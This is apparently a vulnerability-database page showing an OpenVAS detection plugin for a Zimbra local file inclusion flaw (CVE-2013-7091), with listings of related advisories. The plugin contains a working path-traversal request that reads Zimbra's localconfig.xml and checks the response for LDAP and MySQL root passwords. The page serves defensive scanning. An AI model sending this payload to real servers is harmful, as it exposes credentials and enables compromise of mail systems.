Zimbra < 7.0.0 LFI Vulnerability - Active Check
🗓️ 11 Dec 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType
openvas🔗 plugins.openvas.org👁 30 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Zimbra Collaboration Server LFI Vulnerability | 24 Dec 201300:00 | – | zdt | |
| CVE-2013-7091 | 6 Dec 201300:00 | – | circl | |
| Zimbra Collaboration Server Local File Inclusion (CVE-2013-7091) | 12 Jan 201400:00 | – | checkpoint_advisories | |
| CVE-2013-7091 | 13 Dec 201318:00 | – | cve | |
| CVE-2013-7091 | 13 Dec 201318:00 | – | cvelist | |
| Zimbra iCollaboration Server LFI | 27 Aug 201600:00 | – | dsquare | |
| Zimbra 2009-2013 - Local File Inclusion | 6 Dec 201300:00 | – | exploitdb | |
| Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit) | 24 Dec 201300:00 | – | exploitdb | |
| Zimbra Collaboration Server LFI | 6 Dec 201300:00 | – | metasploit | |
| http-vuln-cve2013-7091 NSE Script | 4 May 201415:11 | – | nmap |
10
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:zimbra:collaboration";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103853");
script_version("2026-01-09T15:42:56+0000");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_tag(name:"last_modification", value:"2026-01-09 15:42:56 +0000 (Fri, 09 Jan 2026)");
script_tag(name:"creation_date", value:"2013-12-11 13:52:09 +0100 (Wed, 11 Dec 2013)");
script_cve_id("CVE-2013-7091");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
script_name("Zimbra < 7.0.0 LFI Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2013 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_zimbra_consolidation.nasl");
script_mandatory_keys("zimbra/admin_console_or_web_client/http/detected");
script_require_ports("Services/www", 443);
script_tag(name:"summary", value:"Zimbra is prone to a local file include (LFI) vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request which tries to read the
localconfig.xml file.");
script_tag(name:"insight", value:"A local file inclusion in /res/I18nMsg, AjxMsg, ZMsg, ZmMsg,
AjxKeys, ZmKeys, ZdMsg and Ajx%20TemplateMsg.js.zgz allows to read any local file.");
script_tag(name:"impact", value:"An attacker can exploit this vulnerability to obtain potentially
sensitive information and execute arbitrary local scripts. This could allow the attacker to
compromise the application and the computer.");
script_tag(name:"affected", value:"Zimbra versions 2009, 2010, 2011, 2012 and 2013. Other versions
might be affected as well.");
script_tag(name:"solution", value:"Update to version 7.0.0 or later.");
script_xref(name:"URL", value:"http://files.zimbra.com/website/docs/7.0/Zimbra%20OS%20Release%20Notes%207.1.4-2.pdf");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/64149");
script_xref(name:"URL", value:"http://exploitsdownload.com/exploit/linux/zimbra-0day-exploit-privilegie-escalation-via-lfi");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if( ! port = get_app_port( cpe:CPE, service:"www" ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
url = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
req = http_get( item:url, port:port );
buf = http_keepalive_send_recv( port:port, data:req );
if( "zimbra_ldap_password" >< buf && "mysql_root_password" >< buf ) {
report = http_report_vuln_url( url:url, port:port );
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Jan 2026 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 25
EPSS0.86311